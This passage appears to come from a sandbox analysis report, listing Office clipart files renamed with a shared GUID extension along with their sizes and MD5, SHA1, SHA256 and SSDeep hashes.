C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.32 KB MD5: c323aef8e88ad3805dbba4c61557d9f5
SHA1: fc4a2d62a1586e72a878d4f347c6d5c88ed038e8
SHA256: 9680e624510dd49ba9895ef946bea236ab3b51ebe19ed01eed14edb8442ca760
SSDeep: 768:I0npwiWi36e8GY+5p8RPgx0l8iYeKLLEsdxGPOmdc04+xc8Fo1zYyuVacGT/L79a:3yA63Gd5eVgx9i/kbviOcrBxHo1zluVr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.25 KB MD5: 391c6faf40158728ce4b76caf5f76ba1
SHA1: 396ee42ece61d5914f36e4addab4b729b8a78b85
SHA256: b9b841f8439f3f4d517108ebbb4f3b6da59352f946e3decc3f0f2707edf037bc
SSDeep: 96:Qay6JmeTuyYIuGyhSi3TaFJHy8yGMrbi3WOC1nBSZXgr6QZtP3KbsXnaq1rpk1R3:NTVTuouGyhSioRjMfi3Wl1nBSZXApZtq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.59 KB MD5: 105acdd0b1a35d7a9e0decab26712fa3
SHA1: 8edb4dcaa9af86622cb57be992acaeff02ed8663
SHA256: 75f1acf297c57a02c37582fa51ed85f44d42f11ce5177ad37cb46ead5b106aec
SSDeep: 192:nyZ3P31hg22adUEueWE+YO+eIdsNTAzA7TKZiqrRCoXTDZLn5:nk3v1NtUEue4YOdId2kUPKxrEoXTtl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.38 KB MD5: 7ad04b26549d51d738c33edfceebf586
SHA1: b70d0080a87c4f12d15e5b55b2ca84e88f569b5c
SHA256: 3fc58d795b9ff9b9275eea3905aaf73d9bd7222e948e6bcd1d38f329c995efdc
SSDeep: 192:tn70/GxkGtm//iaLhOKflZUmToJTeDTIT7T1LT9ToTtT8TQjT0TTTcTcrTJT6Te0:tn70uxk4s/ia1OKflZpWUsf5xs5g8jQC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.50 KB MD5: f777da22262b5e36a76ff8cba24c9ae0
SHA1: 23f7daee259f097e50dc79c85aa813886a5a6509
SHA256: 0788cc8a32ebaa8812ff68f2f1877a23f8dbf0ef3b5befba2c0db8aa377ad144
SSDeep: 192:jcnb1Ok51c3ckKTFshcJ3qqxgQ+f6oyh7dwpuAXfc+FzYWq6xHiEKOGS2DLpw8kL:jcb19Lj5shcNqWgQ+f6th7dwuAPc+5hz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.26 KB MD5: fc407abb3f93433b3c3ae30caf1e4289
SHA1: 49e6289f1dc798f97ab4d9def91e0ecbb91bd5b9
SHA256: 68018b1ecf126c3e8e2c66ef79c366dd75659c785d88fd73a4fc8b4d57922cc7
SSDeep: 768:tlUynRmMDMd996e1hhFN00t2vIAffRFl5SIshQwZEOsHnn7PWw6tXhGMotVSuKbF:cyReHrtOjHsFgQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.11 KB MD5: f9e856bef63db969d0bcef154f73d94e
SHA1: ae5e38b788a8dfec3564b890b69a6c68f2f6eb5e
SHA256: 97b621c02495840c909b45d39d3ac4f8e1b606fec12155cd40345878212b5495
SSDeep: 384:jzjsSDsO3Z3fBfF5uN9EuOMdeLschGLX95JwS8igFtQFl57AZRLZn1jwSxPG8xXe:j3sSQ2FfBfF5uN9EuOMdeLschGLX7JwY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.08 KB MD5: d4736a3509ded20659ce7f97d0bdda2f
SHA1: 1ab1cfa57be2b39d072b951b907b2615fe9821e1
SHA256: 4af7748559f2127b5d2975154b9d86adb55186933f4577dd2721b39e96a06b99
SSDeep: 192:TvR2vqK17yxN8XHjRVHQ3LCLDXUTBpI4TJ+MZaVoKtguDheLX5lOsXPNabi9yNlJ:TvRUqsyzKHjRy3LCvk1pI4V+MZayKtg+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.05 KB MD5: 9521d6973cb08cbeed01cc97d15c37d4
SHA1: 32fd41221a75cc88f23202d54c3c7342011c7cd0
SHA256: ba8acfc87eb13e1074628d1ddb5e928091412da9e81e18216189d1e8d2cb8a18
SSDeep: 384:vHDz2EAfr7+5MiW/fbkuZie9XPNCqOSVoNef9h1QPP/b2rMMM3kussKjp3Waw/9j:vX2EAfr7EMiWrkuZfXlUSVku9LQPP/bD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.68 KB MD5: 6f29c01befc64250b3579943c8b1d9cc
SHA1: 8d4810d8e6834fc27b8430371e098cda93383c8f
SHA256: b716927eaebc2b5f52e1bbccdc40d5707804be9ffd45e4dbce8307164daa7a0c
SSDeep: 384:0MfSKnbmYaVMsgnL1VoYjIq/Zb8RYTdpjIn5cU3NUPjXxr/qjOBZqZcCXeo1S/DW:0Mq8bmYaVMscL1VoYjIq/ZbEYTdpjIn3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.63 KB MD5: 46ab16eff18023e78c32d3e50cbf2213
SHA1: 70aa1f95758a942518753022c9583ae70bd4b603
SHA256: bbb4af18dbc4aec3be361a33fd882be7ecec060d16ef3812640ff51889669c39
SSDeep: 192:KO5eHz+e02SgI7xIEx5STaEZhr6MvxPRHpydK6b8XjGC+M2HQlza4O+mEIfs4L4o:KOYz/02Sg69QaEZhrBvJRJydK6b8XjGt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.61 KB MD5: 997d3243cca2aec6fa14da0e323eaa87
SHA1: 13741829683411b59764fa116baaeba3a7ce9f77
SHA256: 35153776028ccb1efb1fa181b9dda93b6a382843e6c3694a8c6f5f08d5d8f1f0
SSDeep: 96:PJcFJpwNIcLviL4xrKx6hifFSwZmoN0RycKgjrtQudWPK4oARwzipnlhb:BcMr6LorKxvfQwbN0UJgvtQudkh9Rwmh
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.68 KB MD5: f0b5e1bf110a81a49df0bd234bd550dc
SHA1: 8906f43e86cdfb5c8b4724727dd5e578a24ec262
SHA256: 04fc37f4c92e11f6539a8049407d7faa3cc3fb099922a2d4bbd9bcf5c07898fb
SSDeep: 192:EyEqPiqkDpwK3Am9gQNjXF9wP8ezRPobGZ722JgunS/b4j/c0njU5cG+/mCkXWK6:EtYkFZfGK5uP8ezRPoCJ22Jnnmb4j/cy
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.19 KB MD5: b1f261c9281c2b34774fcba95aa75963
SHA1: 615c29bc0c1bb9338e0af519cce59c26bace3b5c
SHA256: 551a65be9d0b02c010d419fa372118bf7eaadf2eb4a1c74d4903f3922ffd31c3
SSDeep: 192:v/tTvdfZFyomBJ/l2q21XZyGam4UOqYHt/4RLFzITOiW:v/5lfZFFeJN2q21JyGamFOqkt/4RhzmQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.13 KB MD5: 3fc862df34ae96f7b1b3a8b7c2241d20
SHA1: 3764477487537f3e338031eb8cd54aaa4d76f5ac
SHA256: 3abab5089ec5cceff88036772cabc9436ad6041a8b58b78cb0cfa78f4dee5adb
SSDeep: 192:IqjDLh03ZQ4Ihz5GTEV3ATzVH9xKV+W0iM17lAS:I2LS3al12EVQXp9xKV+//17lAS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.24 KB MD5: 61c59660fb4bd376e71d5ccbd2b9bed9
SHA1: 399907b02d1a4a5f99b975d200d126137704f1f6
SHA256: f5219fb36087d18fea0f27ea97903d8cbb23953339901b9cb7cbe19808fb8a59
SSDeep: 384:u3Zcc4Y9XafCyqJsWeEKq+Pj43RHHKqpe5LNziNrVi11TnqzVmDuz8adRLZkvcW7:u3Oc4Y9XafCiEKrPkRHHlpeRNuBVi11/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 30.09 KB MD5: 3c7d19c044dc0d0f258c9134e5c5d297
SHA1: 7c42ca8d5a34f54ce5ca472b037fcc5a2f6108c5
SHA256: 33439509db74587057701aecb5928279db17a2243ffffd41b96e1cb98c10ae39
SSDeep: 768:HlmxdefetBokAQKDvQVCZhSoETeLoJwfiVlv8UFiiTR/BJDu/yTbukddyBL65RH/:lOMuGWeD7yvjd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.18 KB MD5: e639fa21962f1a4c5fcce6324a523844
SHA1: a4837ace117abef6438ab7babb1d8682c9a78dac
SHA256: ef77e9f160186f638590ad17c529c9d0f6ca0f96791dd95034cde4e65d4cf5fd
SSDeep: 24:t/zKi0Ld5IB4gXoim89uohd1Lnw2CTZH2CxhDbaIIV2Comzqy2CTE6u2CTGzw2Cu:1zQ0B4gYT89L3E9RbKotqo6u+EfW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.18 KB MD5: a6058834143679e9747c25f38f75a644
SHA1: 8db593767483d23add351823affac5f6e074b03d
SHA256: 0791b1dea5d650117178fa1a423f2b5638f15b8f1caa225d7bc1da3fcee3c667
SSDeep: 24:t/J0v5IB4gXoim8aH9w2CaKuqaxH2CaR2n2CaJ772CaVo2CuNx2CanPn2CaZX2C7:1rB4gYT8CGZ1w7M7NdGgZo2W
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.61 KB MD5: eba576da56df420b248c77c0cae93fb8
SHA1: 82f72e9fe49f4e31f7a30142adcbf4305c1fb8c5
SHA256: cfcbbbfef7442cc9ce2e242fb3f19691c03570ada29e9ae3e684f3b2af28aae9
SSDeep: 24:t/u0v5IB4gXoim8qYl9Rw2CY2C/2Clm2CSQ2Clt2C9mD2CqV2Cw4m2CSP2CMg2C6:18B4gYT8qiCsplGSkh9EsKAMUlkWzW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.79 KB MD5: 10d997a6ba42ed3b6c43adb94f443cc6
SHA1: 136873d551b10d072dc19c750baff1c558868345
SHA256: 4a1cf7753b2a883942a72e43f76b0c2f50b71012e412976b5244a01c440e44a9
SSDeep: 96:/Jlc2QoIRp54mGNP+DgLecyS/5M9ElEA8bAZy5DgodLzWX12Zor5Wg4:xld1IRp5JGNP+DgLecyS/5mEuA8bAZmt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.47 KB MD5: da02d7a5eab80b941b365e4066626172
SHA1: 382e4366c23c45532b1dfd844dd7795979ca230e
SHA256: 23bc7764de8e829a4eeca3c311cf8a0a3ca86cd52ab15655a00eb0701487b125
SSDeep: 96:lzJFIIvsydNPNWejSA9+Sy6FZmo+tB+z505c8jaMd05DWXoMmA8GryyMn6bR:llKAsyLNn1+wHmo+tB05bFMC5DWYMmzY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.86 KB MD5: 71a650169fcee0ad8fec00363bf914a5
SHA1: 4e3d1951757c118c2d393141b119dfba8dc68dd0
SHA256: 26db400ca328d61e305cbe48feaa682a48c39275b19c8d8363151ba64bb98d66
SSDeep: 192:J5SrpVdSljiibqomdegkIjHO7Z8m/UWsLw0Eu7IzrfIOVHSU79Ul53w/kyAlJ5EY:J5CVdSlN2oCk8Hct/UWuw0EuMUOV99UD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.54 KB MD5: a6e997e71c666ed95d2e87f92d2280f2
SHA1: cf4c5a57fa55bab833f6f7c68ddaf082f005140b
SHA256: c5acb53a83015c7594791ea51f9ec1e8af84f783656a5d16ec013b2f61aa52a3
SSDeep: 384:DSqM1z27pSc2LmDwSCeJUNQRgUkjLGuDvamDR0MDlAox1vxIozWrHkkHOu0J3VXb:DS11z2oneJUsgnjLGuj3RplAytxxWrEz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.86 KB MD5: 92eaf7e72014e759382a0622a8e9a39c
SHA1: 37bbcbcf4d39a51a5254818a4cebbe947db2fc3f
SHA256: 0f46219b6175a623c045c2c976b8823f9f9d93487f4f085c508d9fee5d587887
SSDeep: 192:rO4Z5U9dSrKGFU9foF2gJuU/jNvP40q21RJ4SAqTz+UL/OG6mR7gnImDq/qI:rBGDSWEU+F2gwUbNn40q21RJp1f+UL/5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.42 KB MD5: aea5d5a1c7feec27f266407c0d6ce0a4
SHA1: 755b96f5e6a3f848ec574c5bb55381f4d54c5bd8
SHA256: 00d2c19dfc09a80b2834b29873b0987f4bd63d33cd7a8429137c8e6a95258aff
SSDeep: 192:ox5go3SeFrtgFYYNVM181sVhALr57B+Omq/B42hihrye0zd2gc7tGP4y344j6wS6:uyoBFSFYYNVweWALr57B+Pq/BJiye0zF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.67 KB MD5: dafc82f6109785d69372dc945deb63e8
SHA1: 0ca9247091951a3cda639249886376e530e940de
SHA256: 40ed69161f19d4852ab560f9aad6af416baee1446d5be2cd71b199ee0ceac388
SSDeep: 192:L8TEJqeT+SJjqnleolqwgW9wsGVaFJNhEHbcFgUQ+VONYwdkHvU:L8iqeT+SQleolqUMVaXNC7wg7+MGHvU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.95 KB MD5: 4173c805548f4f615927a9bf207c21f9
SHA1: 7065fff1dd69f68b5a00120be11bca1f3849d27a
SHA256: 343acc6282050dc0fa52bcc4aa9f404a5638bb7d3b3b7cad0eb81cc30213875f
SSDeep: 192:QBKw6BaDlPJXW5MWuXybJbtjU/RQUKZx6ITprzd71aCGw9Z+xwNgmY2CXxnm89JS:QBr6BUB2YibJbRU/RQUK/Fp7sCP9Z+xe
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.67 KB MD5: 25fd2e3dfce44dbe4116ff7e3f18b0db
SHA1: a08fdca111dc629eb57292ea2bcd99dbb5334bf1
SHA256: c5e02795e3c78e2139245d86872f8b58915c7c220e6d140dc3a01562817a8338
SSDeep: 192:xQ2DlJLtkl+RKBqSOuzlBXRpyTl3wayPiGhq0mgw/cbt+9DBY1RNu7X+bM0gK2Q1:xQ2Bhtkl+RKBqtuzrXRpyTl3wayPieqw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.62 KB MD5: 7e2fb55c9616d68fac4d680b54011d83
SHA1: 4ffd83b2bc59c97dd82667c7d7819ca9265443db
SHA256: 13273ae2b6663af0c0cf6b93932deb38c976d90deb0a8f432e6c96c38543e5ce
SSDeep: 96:4J2yYYWunxzRNuWmx5im3rXCO6ZkqxX9s4H2JR1fhXmLQu:e2yYYWUxzRNuWmx5im3rXCO6Zk+JH2Jm
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 19.63 KB MD5: c24525200b5473e59b0d005526daf0d8
SHA1: 56e11c6d86c45cf34d6714cc6d76b28fc102cafc
SHA256: 62370f7513e6caa2532d3d80ef562483cd3dc6adf2cbe64a14f178c1dfa1f99a
SSDeep: 384:AOTBuE1ORQj3XwkibUTPa6JOKpSHiy6oGKSYsgMvqNFF2DPL92ui/gWFqB9j/daf:AOVukORQj3XwknDO8SHiTVYsgMiNFF2S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.76 KB MD5: fd688c35ba8ef409f5cdcde4ef90d73e
SHA1: 4a8d9416fdf69d4f6e2b44da89e7f470544539cd
SHA256: f10f37f4e0eac0667e043dc12aac27f765b54259f4c06cafb34e8002f0192739
SSDeep: 768:glVxjS+BTbxLcm6DIS6KUKMT8kz+L9IYyEKntpDF2M8p0o/RvV8DbtuPWCur5JV4:UxjSw94m6VKz9l8NTDepS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 30.08 KB MD5: 7aee39cfe8c9bd8014426a4ec4febfc2
SHA1: bb7f1ecdce1170d96c6e01945ecb03f478a51e56
SHA256: c8fb35c900bfebb24a0ce08537aa62e0b792dd4ec876954049eb775f8ab58745
SSDeep: 768:zlu7zCaNQ3NRCMAIRumFkd8a91RDTTq8N9E6WbY5IFQYVGHjpU4Qwm9+XS63mJfm:gfBMp8ZpCMttq+Rn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 37.59 KB MD5: 52f6c3a8351018edc81e52934d58444a
SHA1: ff13df0852f42dcb9f1b8ac2b2f17430ebc059db
SHA256: 4459645554a7343536d71de6259820d0407c4133e30bcec07e91bea9fe8b4bfd
SSDeep: 768:rnJtZEIvelOA7gE9HTRNV+8ZTJY9KxZs6rtVxF79huhACJQJcjqEbTlcn8wuFoxQ:3fviZTt7D6QiEnGiz2Ox4TZCZEXNd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.09 KB MD5: cd16dae4091cac507b656ead9d455ac4
SHA1: a51665fc65b62934265d9e368f947b466829e25b
SHA256: fe220bb6e36dae3549ab20ba31e8c3009b3d610488dc43606ba83d3b668e366f
SSDeep: 384:ytgrszjUhQlPqrIJp+8hA+/nXstIvgu53XkADmwd6UcxHTYQF910HBuBVXhUyn5m:KgrsvUUPWIJp+8hA+PMIIuxXksZ3cdT+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.56 KB MD5: 283f11c2581e0c132dba64d29a3f16d3
SHA1: 0263a1daa58aafa0e787ab759c0f74d904770ad8
SHA256: 44865cc9e7d90ed5a8a2f08aa9628aa00fbf24134f32c4ff0558878a7d8b9717
SSDeep: 384:TywFf5aTXuJHOyDmVkmxF6+bz0wPTU7DieomSfEHHI8ZfhYdCKf7fm+AGouPWZYk:TywFfET+JuqMkmxs+bzvPTeDieomjHHj
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153508.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.45 KB MD5: 191bd63c174995d2829a169bfbcbf63e
SHA1: be838540ff91047768c2498cc3aaffded1ad5c7e
SHA256: c8e01775d88b2434ebac649db140bf0b7ac4cd8a3b1f05d90754af2f737b7b91
SSDeep: 768:aIdByQ6AwsDLHKa/IROt6FADr9AdwJTb99PrrTir78xOXBJSEylEGKQYjH5MOCkm:B2dY7hr/w/iES1X3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153514.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.45 KB MD5: cc186567e76101fe1931825bff7131c9
SHA1: a375c2f91eb3ce4d393609b4fb8dcde9bb6da05c
SHA256: 4c6f8e1bd9bfda0cabc3311757df50ef500e4ebaf08a32c5731fbf03d1e9213f
SSDeep: 384:UlHQKkN4iF340MmfuxK7Hnbe1RBTfyLBAJRPdN2PLPb2gDsj8nuv2lrE+FpKSsyz:UlHQKkNlF340MmfuxKLnbe1RBTqLBAJM
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.24 KB MD5: 7b26b372ed9c95b8847ea477cacdf005
SHA1: 818c11a68975fde3ba1a6c77b79a74ebe68f3326
SHA256: 94ecd925210596404a722be3336cbe09b7f1e2cf9543390c0b80ba0d8f87a0fa
SSDeep: 384:68/O1N/r5NUNEaF+iCv0B3fQfcee4BWKgFRs1WYnzGZoze49bzfCX+TbU5UPUzdV:68/OXrvUSaF+iCv0hfQfcVRKgFRsgYns
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.34 KB MD5: f90f2d747f1ccf706a9c595175ae47b8
SHA1: 3dfb5fe9f293830a097a8ea3b99c04875ba87cc0
SHA256: b18a99799950416458490b15ba2eecf0ec129e53b2e0d17a09374f32624e7cf6
SSDeep: 24:t//Y0phf5IB4gXoim8OrL2V9wqO5Rd2Uuef6G9bWpONSJeQ/ycLuXUFQIw27bKfA:1/FhqB4gYT8OrLsF1UMpON3SCiiW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157167.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.61 KB MD5: 2fdd165e64697c6a61351e1549544d29
SHA1: c672a1894e028143f5edd4cb38e6454ee332a32b
SHA256: f5706d17645045d81414509e307c0a665e252fcba21d8f73ce85c1c3046a911c
SSDeep: 768:pNpDrkCISoJxUa0R3q+lOsP+RTjZKL9fdiyYfV5jrdLUIafJFD8c7wK7p1M8Z7C+:QSWUvuaU19UJFYJUMa7LkNPRqcTLACk7
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 21.21 KB MD5: 68a89e5e504de028e6a72c92e9251b1d
SHA1: a2aa28f54e1c1f9e32768bb71d83cb2c7c297436
SHA256: 5ff579db00b27df5a5501d2e03c16eb287bb8f670375ef2ae607cb1eb88207d1
SSDeep: 384:7fWweGGcxFGbJTa4fGp+uMOHbqoLMWJGdKw0kY8CMLnlGtN152SP/h1w8gVetcmY:7fWweGnxFGbJTa4fDuMsbqoLMWJw0kYa
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157191.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 17.49 KB MD5: 1c95c794a7a51e98597cb0dcbdd6176c
SHA1: ecda45a230af98746bd8cf3daa3c9d899fe2ab32
SHA256: 6353e619ecd69e6f95677bef0340883c482778aaaf7b67a1ff57fe6699ea9c55
SSDeep: 384:HsYBX0Ka1do1UnfGW7u/Ta4lMF2gEhizAHGe4s/mcNn52r4UobcLdLHvraVAZGBa:HsYBX0h1do1cGW7u/TaIMF2gEhizOF/S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 18.22 KB MD5: cf5069d825f12fb3dcffb05d198f01ad
SHA1: 401ce2563b4b36b45397ee9416f9144762a841ca
SHA256: cd207d7cdd5e0fb0c8bce2c8f169fbb335b9cdf86e4cd89e437f516095e5e32d
SSDeep: 384:DrTFfwLI3N3dAUH+IPGqBjVae8mSconepmSOCu+mi9qxCGGJWfnkK52MbSj+qOxs:DrTpwLydXeEJj4e8mSzepmSOCu+mi9qI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.40 KB MD5: 4a0f4b184c3154689cc6cb49e44b8c07
SHA1: 08c93e52fcdfdeacd6dd741093d9771c849c67ed
SHA256: 9550259ab5b5742cfc6cf9c96607bf20e69c91b94ccd8860bc425a077554a91d
SSDeep: 768:WgBvAvP6bf++Hjhl5eAIPwgAwOlILo+CgfPTrwqT3jpzdV4cOpzabCUo:WgBvAotl5egaLopgfv7jpxecOha6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.13 KB MD5: ac91394122ccbb6754eb2334901ef468
SHA1: e2160bc9e57abea1b948cef6209c6c835381f454
SHA256: 0731fae9e14e5d838206ae1be6bca145abbf8c5c07fc984a17c67e27e2773ac5
SSDeep: 384:XQa86tYWEoD+B+fUukZMl1oipX0Ez+UcbzKExh2JU6a4e7eO:XQa86nEoqkrkZMDoYZQbuExhCUlP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171847.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.73 KB MD5: 252708d0878b6b60818e61d0b5fb41b4
SHA1: 087f2516c7e7bf6fbbe872383bf88ff265f3b41a
SHA256: ce959d63b54235b9facffc949ca8f537b85c1cef33b15c78fa8c1fa1bfc6a736
SSDeep: 192:zc/QewbJ7VO3Q5q1UvU3kNlGSy+zFvPJKwtoXCoprD5WD:zc/QHbO3Q5q1U+kNlGSy+zFXJKw6xpro
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 12.40 KB MD5: a0f4f9c03a67f31eea66f46cfad176ee
SHA1: 3a8f2a3a2640ccc74fb32989f727060104b46cb4
SHA256: d833a30411cd268eb9971ac96d05f87ffa8164ca684b5911eea8353b0eaced87
SSDeep: 384:v6vMNENnIXQwTqIEbbceser4pCQN/W5Oig4Ecwhckt3lO8ROmTkzdCmh3BdV/keR:SvaENnqQwTqIEncesu4pCQxW5OigRhcB
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174315.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.73 KB MD5: 0f67e426bb5a711d3d5e99f443827b4f
SHA1: 31b6065ec146c858a9501aab48811fca588c7993
SHA256: fb695a882af9ce8456d635d5fc2c2620a946ae44762661a5922c043d561d7a1f
SSDeep: 96:EpJ+0OOhg/WdWN9CSseriAYt6+V2/LS0gqzQqFPy/t+AckcEyQliTybmvyWczlC4:ED+0OxWdS9CS5iAYt6q2/LS0gmQqFPCl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 9.51 KB MD5: 5fe4921788537703f88c269e5467f60c
SHA1: 336ac1482d28029bc144a6dd931f346620c98018
SHA256: 90417b3c3b5b2d0373f1b66611402e83f69ac59602480ca28dec7f36376d6978
SSDeep: 192:Wkfu0sbbhyxzzXsQmBVoipo0bG1eZ/4Soh/m0cH27cmqsUYCeREw4GDYlJRJ9dWY:Wkfu0cbh8z8QmBVo2o0bG84Th/m7yczL
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.40 KB MD5: f5ffca15d2b5a36e9fc0eee9443e55f1
SHA1: 07610c9b3ba6e6f04fe08a2e2a28b6d8a0112bbd
SHA256: 446cc1e77f7b695d37ae2e501ac988a3d0568c485c7f30f011f1cfd21e04d1d9
SSDeep: 384:zonKXsSkaJTQ4cBPFLiMmhQXhLNibOhcmBWpyr9u5kpbSHPMYkjE+UizzYYP:zoKXEXgfhQXhLNiOWIWpyrNZabEkusYP
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.37 KB MD5: a6bac605be781569366ccb0ce48fb85f
SHA1: 817488279e15e557e217296b19042f64154434cd
SHA256: cadd33459455916596ea6924824782b1b45a38dea37bb5707afb738390fbb21b
SSDeep: 768:F0gy5MSpxSnG/P0LL/HKekG0xBl5TiuKrtxZXkT6uEkfz9FQ7p48gRdvbxdHf6v:l9YxcGIL/4xf9YrjqEkfz7ZdjxEv
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 44.30 KB MD5: ade07aad9a4b88b23927ab31bb00527a
SHA1: 02f389091768b42cdc72f67ac832503968673e71
SHA256: 1d8b6096176583829cf6266fba1f5940ca46a906757c539adf97e998f249b6e0
SSDeep: 768:WCrd1FzJtOArdmfjMpoJ1hqhKdolNsqO/8vQpsCjC2xPP0x0yBNc6Z5Ybpz6BcD2:WCr1+Ax5s7UXzOCI1CokGycE5Ybpzp3C
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 36.12 KB MD5: 6fbf760d0998b470f3282e4dc95f70b6
SHA1: 32ade7b03350ed9d31fd29c95febc6a014e92c54
